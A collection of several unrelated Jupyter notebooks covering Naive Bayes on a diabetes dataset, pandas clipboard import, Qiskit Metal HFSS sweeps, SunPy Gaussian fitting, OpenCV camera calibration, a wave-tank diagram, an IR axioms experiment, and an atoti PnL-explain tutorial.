y_pred_proba = gnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='GNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Gaussian Naive-Bayes ROC Curve: Drop Pregnancies')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
### Drop SkinThickness
```
df = pd.read_csv('diabetes.csv')
df = df.drop('SkinThickness', axis=1)
X = df.drop('Outcome', axis=1).values
y = df['Outcome'].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = gnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='GNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Gaussian Naive-Bayes ROC Curve: Drop SkinThickness')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
### Drop Insulin & SkinThickness
```
df = pd.read_csv('diabetes.csv')
df = df.drop(['SkinThickness', 'Insulin'], axis=1)
X = df.drop('Outcome', axis=1).values
y = df['Outcome'].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = gnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='GNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Gaussian Naive-Bayes ROC Curve: Drop Insulin & SkinThickness')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
| github_jupyter |
***Copy from clipboard*** is a handy feature I use regularly. It helps me quickly get data into a dataframe. The data I am copying over to the clipboard is usually pretty tiny and most likely not saved anywhere. The data I am copying can be in notepad, Excel, or in a CSV file. If I am able to CTRL + C it, then I probably can throw it into a Pandas dataframe.
We start by getting the Pandas library loaded and ready to go.
```
import pandas as pd
import sys
```
Here are the versions of Python and Pandas I am currently on.
```
print('Python: ' + sys.version.split('|')[0])
print('Pandas: ' + pd.__version__)
```
This tutorial is also available in video form. I try to go in more detail in the notebook but the video is worth watching.
```
from IPython.display import YouTubeVideo
YouTubeVideo("tJuVU1b8ZkE")
```
<h2>Create Data and Copy to Clipboard</h2>
The first step I am going to do is open Excel. In the Excel file I am going to create two columns.
* cost
* key
The ***cost*** column will have numbers and the ***key*** column will have text.
Note that it isn't straight forward to show you what I did in Excel, but the picture below should give you a clue. After I created my two columns and populated them. I then highlited them and copied them to my clipboard. If in doubt see the video above.
> Tip: Make sure your Notebook pictures are not dependent on external image files
The image function below actually ***converts the jpg into a base64 image***. This means that the notebook does not need the excel_copy.jpg anymore. The image is actually embeded in the Notebook and can be shared easily. Now if you try to run the cell below without the image file, then yes you will get an error.
```
from IPython.display import Image
Image(filename="excel_copy.jpg")
```
Now that we have our data copied to the clipboard. Let's get it loaded into a dataframe!
```
df = pd.read_clipboard()
df
```
It is very important you immediately check your column data types. Pandas might make some false assumptions on your data. Dates may be labeled as text and dollar signs/commas may be imported into your number fields.
The ***.info()*** method gives you a row count and the data types of the entire dataframe. ***Costs*** came in as numbers and the ***key*** column as type object which basically means it came in as text. This is great news since we do not have to correct any data types.
```
df.info()
```
<h2>Copy from SQL</h2>
I have a local installation of mssql and we can use this to copy a result from a query. There are times when you rather move your data away ***from SQL and into Pandas***. We can easily do this by copying the results of the query to the clipboard.
In the background, I opened up SQL Server Management Studio, connected to a DB, and queried a table named data. The picture below shows you the output of the query and the act of copying to the clipboard.
```
Image(filename="sql_copy.jpg")
```
We will be importing three columns.
* Date - Holds daily dates of stock symbols
* Symbol - Holds stock symbols
* Volume - Holds volume of stocks for a specific date
And yes, we will be using the same ***read_clipboard*** function we used earlier.
```
df2 = pd.read_clipboard()
df2
```
Now notice that Pandas did a mistake. It imported the ***Date column as text***. We need the Date column to be of a date data type. The other columns were imported without any issues.
```
df2.info()
```
Let's fix that issue so we can use the df2 dataframe for analysis. Now if the date field is not important to you then it doesn't matter and we can move on. But for me, I would for sure want this column in the correct data type.
Pandas comes with a handy function called ***to_datetime*** and this function converts whatever you throw at it to a date. Our Date column was already formatted like a date so Pandas had no issue converting it from text to date. We also set the Date column to the converted rows. If we did not do this then df2 would not have been changed.
```
df2['Date'] = pd.to_datetime(df2['Date'])
```
We then confirm our code worked by re-running the .info() function. And Voila!
Just remember to ***check your data types*** when using the read_clipboard function. Happy coding!
```
df2.info()
```
<p class="text-muted">This tutorial was created by <a href="http://www.hedaro.com" target="_blank"><strong>HEDARO</strong></a></p>
| github_jupyter |
# Sweeps - Eigenmode matrix
### Prerequisite
You need to have a working local installation of Ansys
## 1. Perform the necessary imports and create a QDesign in Metal first.
```
%load_ext autoreload
%autoreload 2
import qiskit_metal as metal
from qiskit_metal import designs, draw
from qiskit_metal import MetalGUI, Dict, Headings
from qiskit_metal.analyses.quantization import EPRanalysis
# Create the design in Metal
# Create a design by specifying the chip size and open Metal GUI.
design = designs.DesignPlanar({}, True)
design.chips.main.size['size_x'] = '2mm'
design.chips.main.size['size_y'] = '2mm'
gui = MetalGUI(design)
from qiskit_metal.qlibrary.qubits.transmon_pocket import TransmonPocket
from qiskit_metal.qlibrary.terminations.open_to_ground import OpenToGround
from qiskit_metal.qlibrary.tlines.meandered import RouteMeander
```
### In this example, the design consists of 1 qubit and 1 CPW connected to OpenToGround.
```
# Allow running the same cell here multiple times to overwrite changes
design.overwrite_enabled = True
# Remove all qcomponents from GUI.
design.delete_all_components()
# So as to demonstrate the quality factor outputs easily, the
#subtrate material type is being changed to FR4_epoxy from the
#default of silicon
design.chips.main.material = 'FR4_epoxy'
q1 = TransmonPocket(
design,
'Q1',
options=dict(pad_width='425 um',
pocket_height='650um',
hfss_inductance = '17nH',
connection_pads=dict(
readout=dict(loc_W=+1, loc_H=+1, pad_width='200um'))))
otg = OpenToGround(design,
'open_to_ground',
options=dict(pos_x='1.75mm', pos_y='0um', orientation='0'))
readout = RouteMeander(
design, 'readout',
Dict(
total_length='6 mm',
hfss_wire_bonds = True,
fillet='90 um',
lead=dict(start_straight='100um'),
pin_inputs=Dict(start_pin=Dict(component='Q1', pin='readout'),
end_pin=Dict(component='open_to_ground', pin='open')),
))
gui.rebuild()
gui.autoscale()
```
## 2 Metal passes information to 'hfss' simulator, and gets a solution matrix.
```
# Create a separate analysis object for the combined qbit+readout.
eig_qres = EPRanalysis(design, "hfss")
```
Prepare data to pass as arguments for method run_sweep().
Method run_sweep() will open the simulation software if software is not open already.
```
### for render_design()
# Render every QComponent in QDesign.
render_qcomps = []
# Identify which kind of pins in Ansys.
# Follow details from renderer in
# QHFSSRenderer.render_design.
# No pins are open, so don't need to utilize render_endcaps.
open_terminations = []
#List of tuples of jj's that shouldn't be rendered.
#Follow details from renderer in QHFSSRenderer.render_design.
render_ignored_jjs = []
# Either calculate a bounding box based on the location of
# rendered geometries or use chip size from design class.
box_plus_buffer = True
# For simulator hfss, the setup options are :
# min_freq_ghz, n_modes, max_delta_f, max_passes, min_passes, min_converged=None,
# pct_refinement, basis_order
# If you don't pass all the arguments, the default is determined by
# QHFSSRenderer's default_options.
# If a setup named "sweeper_em_setup" exists in the project, it will be deleted,
# and a new setup will be added.
eig_qres.sim.setup.name="sweeper_em_setup"
eig_qres.sim.setup.min_freq_ghz=4
eig_qres.sim.setup.n_modes=2
eig_qres.sim.setup.max_passes=15
eig_qres.sim.setup.min_converged = 2
eig_qres.sim.setup.max_delta_f = 0.2
eig_qres.setup.junctions.jj.rect = 'JJ_rect_Lj_Q1_rect_jj'
eig_qres.setup.junctions.jj.line = 'JJ_Lj_Q1_rect_jj_'
```
### - Connect to Ansys HFSS, eigenmode solution.
### - Rebuild QComponents in Metal.
### - Render QComponents within HFSS and setup.
### - Delete/Clear the HFSS between each calculation of solution matrix.
### - Calculate solution matrix for each value in option_sweep.
#### Return a dict and return code. If the return code is zero, there were no errors detected.
#### The dict has: key = each value used to sweep, value = data from simulators
#### This could take minutes based size of design.
```
#Note: The method will connect to Ansys, activate_eigenmode_design(), add_eigenmode_setup().
all_sweeps, return_code = eig_qres.run_sweep(readout.name,
'total_length',
['10mm', '11mm', '12mm'],
render_qcomps,
open_terminations,
ignored_jjs=render_ignored_jjs,
design_name="GetEigenModeSolution",
box_plus_buffer=box_plus_buffer
)
all_sweeps.keys()
# For example, just one group of solution data.
all_sweeps['10mm'].keys()
all_sweeps['10mm']
all_sweeps['10mm']['variables']
all_sweeps['10mm']['sim_variables']['convergence_t']
all_sweeps['10mm']['sim_variables']['convergence_f']
# Uncomment the next close simulation software.
#eig_qres.sim.close()
# Uncomment next line if you would like to close the gui
#gui.main_window.close()
```
| github_jupyter |
```
%matplotlib inline
```
# Solar Data Processing with Python Part II
Now we have a grasp of the basics of python, but the whole reason for downloading python in the first place was to analyze solar data. Let's take a closer look at examples of solar data analysis.
We will be using SunPy to access solar data. SunPy is a python package designed to interface between the powerful tools that exist in other Python Libraries with current repositories of solar data. With SunPy we will show how to: download solar data sets from the VSO, calibrate to industry standards, plot and overlay a time series.
# Fitting A Gaussian to Data.
One of the most common data types in solar data processing is a time series. A time series is a measurement of how one physical parameter changes as a function of time. This example shows how to fit a gaussian to a spectral line. In this example, it will be as "real world" as possible.
First, let's import some useful libraries.
```
from datetime import datetime, timedelta #we saw these in the last tutorial
import numpy as np
from astropy.io import fits #how to read .fits files
from astropy.modeling import models, fitting #some handy fitting tools from astropy
import matplotlib.pyplot as plt
from scipy.integrate import trapz #numerical itegration tool
import astropy.units as u #units!!
import sunpy #solar data analysis tools
import sunpy.data.sample #Data interaction tools
sunpy.data.download_sample_data() #Download some sample data
```
Next we need to load in the data set we want to work with:
```
filename = sunpy.data.sample.GBM_LIGHTCURVE
hdulist = fits.open(filename)
```
So what did we get when we opened the file? Let's take a look:
```
len(hdulist)
```
We got 4 items in the list. Lets take a look at the first one:
```
hdulist[0].header
```
It looks like this data is from the GLAST telescope measuring gamma rays. Let's take a look at the second item:
```
hdulist[1].header
```
Alright, now we are getting somewhere. This has data in units of 'keV' and max/min measurements. Let's take a look at the other elements of the list we got:
```
hdulist[2].header
hdulist[3].header
```
So it looks like we are working with some energy counts data, temportal information, quality measurements, etc.
# Plotting Spectral Data
Let's take a look at some of the data we've got.
```
len(hdulist[2].data)
hdulist[2].data.names
hdulist[2].data["COUNTS"]
hdulist[2].data["COUNTS"].shape
```
There is a large array of counts at 128 different energies. Let's take a look at the lowest energy measurements:
```
plt.plot(hdulist[2].data["counts"][:,0])
```
So now we have a plot of counts over some perieod of time. We can see there is one major spike in the data. Let's filter the data so that we just have the major peak without the spike.
```
w = np.logical_and(hdulist[2].data["counts"][:,0] > 300, hdulist[2].data["counts"][:,0] < 2000)
w
```
This function, "np.logical_and", is similar to a "where" statement in IDL. We can see that "w" is now an array of true and false values. To take a subsection of our data where our filter is true:
```
counts = hdulist[2].data["counts"][:,0][w]
plt.plot(counts)
counts
len(counts)
```
Now, it is good to add some units to data when you can. The header of the file tells us what the units are, but in this case, counts have no units.
# Fitting the data with a Gaussian
Now that we have extracted a detection feature from the whole data. Now let's say we want to fit it with a gaussian. Do do this we will make use of a couple of packages in in astropy. We will initialize the gaussian fit with some approximations (max, center, FWHM):
```
g_init = models.Gaussian1D(1500, 300, 100)
```
Now let's define a fitting method and produce a fit:
```
fit_g = fitting.LevMarLSQFitter()
```
Since this fitting routine expects both X and Y coordinate data, we need to define an X vector:
```
t=np.arange(0,len(counts))
g = fit_g(g_init, t, counts)
```
Let's take a look at some of the qualities of our fitted gaussian:
```
g.mean
g.stddev
g.amplitude
g
```
Our guesses wern't too bad, but we over estimated the Standard Deviation by about a factor of 5. The variable 'g' has the fitted parameters of our gaussian but it doesn't actually contain an array. To plot it over the data, we need to create an array of values. We will make an array from 0 to 1410 with 2820 points in it.
```
x = np.linspace(0, 1410, 2820)
```
To find the values of our fit at each location, it is easy:
```
y = g(x)
```
Now we can plot it:
```
plt.plot(counts)
plt.plot(x, y, linewidth=2)
```
That isn't a very good fit. If we chose a more clever way to filter our data, or possibly fit two gaussians that could improve things.
# Ingegrating under the curve.
Let's find the area under the curve we just created. We can numerically integrate it easily:
```
intensity = trapz(y,x)
intensity
```
| github_jupyter |
```
%%HTML
<style> code {background-color : pink !important;} </style>
```
Camera Calibration with OpenCV
===
### Run the code in the cell below to extract object points and image points for camera calibration.
```
import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
%matplotlib qt
# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
objp = np.zeros((6*8,3), np.float32)
objp[:,:2] = np.mgrid[0:8, 0:6].T.reshape(-1,2)
# Arrays to store object points and image points from all the images.
objpoints = [] # 3d points in real world space
imgpoints = [] # 2d points in image plane.
# Make a list of calibration images
images = glob.glob('calibration_wide/GO*.jpg')
# Step through the list and search for chessboard corners
for idx, fname in enumerate(images):
img = cv2.imread(fname)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Find the chessboard corners
ret, corners = cv2.findChessboardCorners(gray, (8,6), None)
# If found, add object points, image points
if ret == True:
objpoints.append(objp)
imgpoints.append(corners)
# Draw and display the corners
cv2.drawChessboardCorners(img, (8,6), corners, ret)
#write_name = 'corners_found'+str(idx)+'.jpg'
#cv2.imwrite(write_name, img)
cv2.imshow('img', img)
cv2.waitKey(500)
cv2.destroyAllWindows()
```
### If the above cell ran sucessfully, you should now have `objpoints` and `imgpoints` needed for camera calibration. Run the cell below to calibrate, calculate distortion coefficients, and test undistortion on an image!
```
import pickle
%matplotlib inline
# Test undistortion on an image
img = cv2.imread('calibration_wide/test_image.jpg')
img_size = (img.shape[1], img.shape[0])
# Do camera calibration given object points and image points
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, img_size,None,None)
dst = cv2.undistort(img, mtx, dist, None, mtx)
cv2.imwrite('calibration_wide/test_undist.jpg',dst)
# Save the camera calibration result for later use (we won't worry about rvecs / tvecs)
dist_pickle = {}
dist_pickle["mtx"] = mtx
dist_pickle["dist"] = dist
pickle.dump( dist_pickle, open( "calibration_wide/wide_dist_pickle.p", "wb" ) )
#dst = cv2.cvtColor(dst, cv2.COLOR_BGR2RGB)
# Visualize undistortion
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(20,10))
ax1.imshow(img)
ax1.set_title('Original Image', fontsize=30)
ax2.imshow(dst)
ax2.set_title('Undistorted Image', fontsize=30)
```
| github_jupyter |
# Laboratory setup
```
import matplotlib.pyplot as plt
import numpy as np
```
## Parameters
```
# Width and height of individual panels of the ASIST tank
PANEL_WIDTH = 23/11
PANEL_HEIGHT = 2
# We have a total of 19 panels
SUSTAIN_WIDTH = 23
SUSTAIN_HEIGHT = 2
#resting water depth, need to fix KRD
H = 0.8
#irgason, combined positions from two runs
irgason1 = (7.15, SUSTAIN_HEIGHT - 0.6)
irgason2 = (9.55, SUSTAIN_HEIGHT - 0.6)
irgason3 = (11.98, SUSTAIN_HEIGHT - 0.6)
# UDM positions
udm = [3.40, 6.25, 8.85, 11.31, 13.96]
#wave wires (combined posistions from 2 runs)
wave_wire = [1.53, 6.14, 9.30, 10.80, 14.0]
#pressure ports (16.32 only on last run)
static_pressure = [1.68, 3.51, 5.34, 7.17, 9.00, 10.83, 12.66, 14.49, 16.32]
#Pitot + hotfilm
pitot = 9.85
fig = plt.figure(figsize=(16, 5))
ax = fig.add_subplot(111, xlim=(-1, SUSTAIN_WIDTH + 1), ylim=(0, SUSTAIN_HEIGHT))
for u in udm:
plt.plot(u, 1.94, 'ws', mec='k', ms=12, clip_on=False, zorder=5)
plt.plot([u, u - 0.1], [2, H], 'k:', lw=1)
plt.plot([u, u + 0.1], [2, H], 'k:', lw=1)
#irgason placement
plt.plot(irgason1[0], irgason1[1], 'k*', ms=12, clip_on=False, zorder=5)
plt.plot(irgason2[0], irgason2[1], 'k*', ms=12, clip_on=False, zorder=5)
plt.plot(irgason3[0], irgason3[1], 'k*', ms=12, clip_on=False, zorder=5)
#water
plt.plot([-0.5, SUSTAIN_WIDTH], [H, H], 'c-', lw=2)
plt.fill_between([-0.5, SUSTAIN_WIDTH], [H, H], color='c', alpha=0.5)
# beach
x = np.linspace(19,23, 30)
y = (-1/16)*(x-23)**2+1
plt.plot(x,y, 'k:', lw=3)
plt.text(18, -0.55, 'Porous beach', fontsize=16)
# inlet
plt.plot([-1, 0], [1, 1], 'k-', lw=3)
plt.plot([-0.5, -0.5], [0, 1], 'k-', lw=2)
plt.plot([-1, -0.5], [0.25, 0.25], 'k-', lw=2)
plt.arrow(-0.5, 1.5, 1, 0, width=0.2, head_width=0.5, clip_on=False, zorder=5)
plt.text(-1, 2.2, 'Wind inlet', zorder=10, fontsize=16, ha='center')
plt.text(-1, -0.55, 'Wavemaker', fontsize=16, ha='center')
# outlet
plt.plot([SUSTAIN_WIDTH, SUSTAIN_WIDTH], [0, 1], 'k-', lw=3)
plt.plot([SUSTAIN_WIDTH, SUSTAIN_WIDTH + 1], [1, 1], 'k-', lw=3)
plt.arrow(SUSTAIN_WIDTH - 1, 1.5, 1, 0, width=0.2, head_width=0.5, clip_on=False, zorder=5)
plt.text(SUSTAIN_WIDTH, 2.2, 'Outlet', fontsize=16)
# tank
plt.plot([-1, SUSTAIN_WIDTH + 1], [2, 2], 'k-', lw=3, clip_on=False)
plt.plot([-1, SUSTAIN_WIDTH], [0, 0], 'k-', lw=3, clip_on=False)
for w in wave_wire:
plt.plot(w, 1.94, 'kv', ms=12, clip_on=False, zorder=5)
plt.plot([w, w ], [2, 0], 'k', lw=1)
for p in static_pressure:
plt.plot(p, 2, 'wo', mec='k', ms=12, clip_on=False, zorder=5)
plt.plot(pitot, 1.2, 'kx', ms=12, clip_on=False, zorder=5)
plt.plot([pitot,pitot], [2, 0], 'k', linewidth = 3)
plt.plot(np.nan, np.nan, 'k*', ms=16, label='Sonic anemometer')
plt.plot(np.nan, np.nan, 'ws', mec='k', ms=16, label='Ultrasonic Distance Meter')
plt.plot(np.nan, np.nan, 'kv', ms=16, label="Wave Wire")
plt.plot(np.nan, np.nan, 'wo', mec='k', ms=16, label="Static Pressure Ports")
plt.plot(np.nan, np.nan, 'kx', ms=16, label="Pitot + hot-film")
plt.legend(bbox_to_anchor=(0.2, 0.8), bbox_transform=plt.gcf().transFigure,
prop={'size': 16}, ncol=3, fancybox=True, shadow=True)
plt.xlabel('Fetch [m]', fontsize=16)
plt.ylabel('Height [m]', fontsize=16)
plt.xlim(-1, 24)
plt.xticks(range(0, 24, 2))
ax.tick_params(axis='both', labelsize=16)
fig.subplots_adjust(left=0.1, bottom=0.2, top=0.7, right=0.95)
plt.savefig('laboratory_setup.png', dpi=300)
```
| github_jupyter |
```
from sys import modules
IN_COLAB = 'google.colab' in modules
if IN_COLAB:
!pip install -q ir_axioms[examples] python-terrier
# Start/initialize PyTerrier.
from pyterrier import started, init
if not started():
init(tqdm="auto")
edition = 28
track = "deep.passages"
dataset_name = "msmarco-passage/trec-dl-2019/judged"
contents_field = "text"
depth = 10
from pyterrier.datasets import get_dataset
from ir_datasets import load
dataset = get_dataset(f"irds:{dataset_name}")
ir_dataset = load(dataset_name)
from pathlib import Path
cache_dir = Path("cache/")
index_dir = cache_dir / "indices" / dataset_name.split("/")[0]
result_dir = Path(
"/mnt/ceph/storage/data-in-progress/data-research/"
"web-search/web-search-trec/trec-system-runs"
) / f"trec{edition}" / track
result_files = list(result_dir.iterdir())
from pyterrier.index import IterDictIndexer
if not index_dir.exists():
indexer = IterDictIndexer(str(index_dir.absolute()))
indexer.index(
dataset.get_corpus_iter(),
fields=[contents_field]
)
from pyterrier.io import read_results
from pyterrier import Transformer
from tqdm.auto import tqdm
results = [
Transformer.from_df(read_results(result_file))
for result_file in tqdm(result_files, desc="Load results")
]
results_names = [result_file.stem.replace("input.", "") for result_file in result_files]
from ir_axioms.axiom import (
ArgUC, QTArg, QTPArg, aSL, PROX1, PROX2, PROX3, PROX4, PROX5, TFC1, TFC3, RS_TF, RS_TF_IDF, RS_BM25, RS_PL2, RS_QL,
AND, LEN_AND, M_AND, LEN_M_AND, DIV, LEN_DIV, M_TDC, LEN_M_TDC, STMC1, STMC1_f, STMC2, STMC2_f, LNC1, TF_LNC, LB1,
REG, ANTI_REG, ASPECT_REG, REG_f, ANTI_REG_f, ASPECT_REG_f
)
axioms = [
ArgUC(), # Very slow due to network access.
QTArg(), # Very slow due to network access.
QTPArg(), # Very slow due to network access.
aSL(),
LNC1(),
TF_LNC(),
LB1(),
PROX1(),
PROX2(),
PROX3(),
PROX4(),
PROX5(),
REG(),
REG_f(),
ANTI_REG(),
ANTI_REG_f(),
ASPECT_REG(),
ASPECT_REG_f(),
AND(),
LEN_AND(),
M_AND(),
LEN_M_AND(),
DIV(),
LEN_DIV(),
RS_TF(),
RS_TF_IDF(),
RS_BM25(),
RS_PL2(),
RS_QL(),
TFC1(),
TFC3(),
M_TDC(),
LEN_M_TDC(),
STMC1(), # Rather slow due many similarity calculations.
STMC1_f(), # Rather slow due many similarity calculations.
STMC2(),
STMC2_f(),
]
axiom_names = [axiom.name for axiom in axioms]
from ir_axioms.backend.pyterrier.experiment import AxiomaticExperiment
experiment = AxiomaticExperiment(
retrieval_systems=results,
topics=dataset.get_topics(),
qrels=dataset.get_qrels(),
index=index_dir,
dataset=ir_dataset,
contents_accessor=contents_field,
axioms=axioms,
axiom_names=axiom_names,
depth=depth,
filter_by_qrels=False,
filter_by_topics=False,
verbose=True,
cache_dir=cache_dir,
)
preferences = experiment.preferences
preferences.to_csv(f"trec-{edition}-{track}-preferences-all-axioms-depth-{depth}.csv")
```
| github_jupyter |
## PnL Explain : Estimating PnL using sensitivities and Market Data
For more context and definitions around pnl explained, [check out our article on atoti.io](https://www.atoti.io/pnl-explained-with-atoti/).
### A few definitions:
- [Portfolio](https://www.investopedia.com/terms/p/portfolio.asp) refers to any collection of financial assets such as stocks, bonds and cash.
- [PnL](https://www.investopedia.com/terms/p/plstatement.asp) is a common term used in trading referring to the total "Profit and Loss" made by a portfolio over a certain time period.
- [Maturity date](https://www.investopedia.com/terms/m/maturitydate.asp) refers to the due date on which a borrower must pay back the principal of a debt, i.e. the initial amount of money borrowed.
- [Tenor](https://www.investopedia.com/terms/t/tenor.asp) refers to the length of time remaining in a contract, while maturity refers to the initial length of the agreement upon its inception. The tenor of a financial instrument declines over time, whereas its maturity remains constant.
- [Yield curve](https://www.investopedia.com/terms/y/yieldcurve.asp) is a graphical representation of interest rates per maturity date.
- [Sensitivity](https://www.investopedia.com/terms/s/sensitivity.asp) is the magnitude of a financial instrument's reaction to changes in underlying factors.
- [Greeks](https://www.investopedia.com/terms/g/greeks.asp) describes the different dimensions of risk involved in taking an options position.
- [Delta](https://www.investopedia.com/terms/d/delta.asp), in particular, is a first-order greek, and represents the ratio that compares the change in the price of an asset to the corresponding change in the price of its derivative. For example, if a stock option has a delta value of 0.75, this means that if the underlying stock increases in price by 1 dollar per share, the option on it will rise by 0.75 dollars per share.
### Introduction
The PnL explain technique seeks to estimate the daily PnL from the change in the underlying risk factors.
In this case the risk factors are determined by the yield curve plotting interest rates for each tenor.
Usually, a portfolio risk manager will monitor the risk factors that impact his portfolio, instead of monitoring all the positions booked in his portfolio. To assess what will be the value of his portfolio, a portfolio risk manager is interested in performing what-if analysis based on a scenario of the risk factor values.
In this notebook, we perform a simplified PnL Explained by using Delta(Δ) to represent our sensitivity instead of the full Greeks. We will utilize the various features of atoti libraries to:
- Load data into a multi-dimensional cube
- Explore the Data using the embedded visualization or atoti UI
- Calculate Estimated PnL using sensitivities and Market Data
- Run multiple scenarios of the Yield Curve Stress Test
<div style="text-align: center;" ><a href="https://www.atoti.io/?utm_source=gallery&utm_content=pnl-explained" target="_blank" rel="noopener noreferrer"><img src="https://data.atoti.io/notebooks/banners/discover.png" alt="Try atoti"></a></div>
```
import atoti as tt
# Create an atoti session
session = tt.create_session(config={"user_content_storage": "content"})
```
## 1.1 Loading Data and creating ActivePivot multidimensional environment
### Creating atoti DataStore
There are many ways atoti can consume data. In this notebook, we will be using read_csv to load data into the datastores.
### Position Sensitivities
```
position_sensitivity = session.read_csv(
"s3://data.atoti.io/notebooks/pnl-explained/position_sensitivities.csv",
keys=["book_id", "instrument_code", "currency", "curve", "tenor"],
table_name="Position_Sensitivities",
)
# you can use head(n) to view the first n rows of the store.
# likewise, you can use position_sensitivity.columns to view the columns available in the store
# lastly, you can use {"columns": len(position_sensitivity.columns), "rows": len(position_sensitivity)} to view the number of rows and columns loaded into the table
position_sensitivity.head(5)
```
### Position Data
```
position_table = session.read_csv(
"s3://data.atoti.io/notebooks/pnl-explained/position_data.csv",
keys=["book_id", "instrument_code"],
table_name="Position",
)
position_table.head(5)
```
### Portfolio structure
```
trading_desk_table = session.read_csv(
"s3://data.atoti.io/notebooks/pnl-explained/trading_desk.csv",
keys=["book_id"],
table_name="Trading_Desk",
)
trading_desk_table.head(5)
```
### Market data
```
market_data_table = session.read_csv(
"s3://data.atoti.io/notebooks/pnl-explained/market_data.csv",
keys=["currency", "curve", "tenor"],
table_name="Market_Data",
)
market_data_table.head()
```
### Creating references between stores
We will proceed to set up references between the stores that we just created. We will perform the join from `position_sensitivity`.
```
position_sensitivity.join(trading_desk_table, mapping={"book_id": "book_id"})
position_sensitivity.join(
position_table, mapping={"book_id": "book_id", "instrument_code": "instrument_code"}
)
position_sensitivity.join(
market_data_table,
mapping={"currency": "currency", "curve": "curve", "tenor": "tenor"},
)
```
### Creating cube
We create the cube using the base store *position_sensitivity*.
Note that we have not passed in any mode in create_cube().
This means that a hierarchy will be automatically created for each non-numeric column and measure will be automatically created for each numeric column.
```
cube = session.create_cube(position_sensitivity, "Position_Sensitivities")
```
We can see that all the stores are joined to *Position Sensitivities Store*, this is what we call the base store.
For a record to be reachable in the cube, it must exists in the base store.
```
cube.schema
```
### Explore the Data Set as a Cube
We have the option to visualize the cube in chart, feature-value, pivot-table or tabular.
Let's look at the sensitivity across currency for each asset class.
```
session.visualize()
```
### Adding business logic calculation
Let's assign a variable to the attributes of the cube, so that we can:
* create measures
* create hierarchies
```
m = cube.measures
h = cube.hierarchies
lvl = cube.levels
```
Let's inspect what hierarchies have been automatically generated during cube creation
```
h
```
Let's inspect what measures have been automatically generated during cube creation
```
m
```
### Creating Measures
From the *Market Data* store, we have the *start of day* and *end of day* value which we used to calculate the change in yields.
```
m["last.VALUE"] = tt.value(market_data_table["last"])
m["start_of_day.VALUE"] = tt.value(market_data_table["start_of_day"])
```
#### Parameter simulation setup
We are going to create a parameter simulation measure `last parameter` that will allow us to create fluctuations to the `last.VALUE`.
This measure will be added to the `last.VALUE` based on scenarios, at specific *tenor* and *currency* levels.
The default value of `last parameter` will be 0.0, hence zero fluctuation from the original value when not defined in the scenario.
We will label the curve derived from the original data set as *Last Curve*
```
curve_simulation = cube.create_parameter_simulation(
"Curve Simulation",
measure_name="last parameter",
default_value=0.0,
levels=[lvl["tenor"], lvl["currency"]],
base_scenario_name="Last Curve",
)
```
As the fluctuations will be by [basis points](https://www.investopedia.com/ask/answers/what-basis-point-bps/), let's format the `last parameter` to show 3 decimal points.
```
m["last parameter"].formatter = "DOUBLE[#.000]"
```
Taking in consideration the potential fluctuations in the `last.VALUE` induced by the simulation, let's compute the `effective last` as follows:
```
m["effective last"] = m["last.VALUE"] + m["last parameter"]
```
We will come back to the simulations later on in the notebook. For now, let's look at how we can compute our Theoretical Pnl.
#### Theoretical Pnl
We derive our Delta by applying `sensi.SUM` to the [notional](https://www.investopedia.com/terms/n/notionalvalue.asp). We, then apply Delta to our change in yield to get the impact of prices:
$Theoretical Pnl = (Delta) \times (Yield Change)$
We will aggregate the *Theoretical PnL* over the levels listed in the scope below as we will be exploring the measure over these levels.
Notice that we are using the `effective last` measure here to compute the delta.
```
m["Theoretical PnL"] = tt.agg.sum(
m["sensi.SUM"]
* (m["effective last"] - m["start_of_day.VALUE"])
* m["notional.SUM"],
scope=tt.scope.origin(
lvl["currency"],
lvl["curve"],
lvl["tenor"],
lvl["book_id"],
lvl["instrument_code"],
),
)
```
### Adding new multi-level hierarchy for portfolio structure
Based on the data that are of interest to the [Buy-Side](https://www.investopedia.com/terms/b/buyside.asp) and [Sell-Side](https://www.investopedia.com/terms/s/sellside.asp), we are going to see how we can structure hierarchies to facilitate the navigation of data in a cube.
#### Asset Mangement : Buy-Side
*Buy-Side* purchases stocks, securities and other financial products, according to the needs and strategy of a portfolio.
It would make data navigation more intuitive to create an *Investment Portfolio Hierarchy* that has Asset Class, Sub Asset Class, Fund and Portfolio as levels.
We would be able to have a global view over the Asset Class level.
If we needed more granular information, we could easily drill-down to the Sub Asset class, Fund and all the way down to the portfolio holding the Asset.
```
h["Investment Portfolio Hierarchy"] = {
"Asset Class": cube.levels["asset_class"],
"Sub Asset Class": cube.levels["sub_asset_class"],
"Fund": cube.levels["fund"],
"Portfolio": cube.levels["portfolio"],
}
```
#### Investment Banks : Sell-Side
*Sell-Side* help companies to raise debt and equity capital and then sell those securities to the *Buy-Side*. \
*Sell-Side* would then be interested in having a global view over the *Business Unit* such as Rates & Credit, Forex, Equity etc.
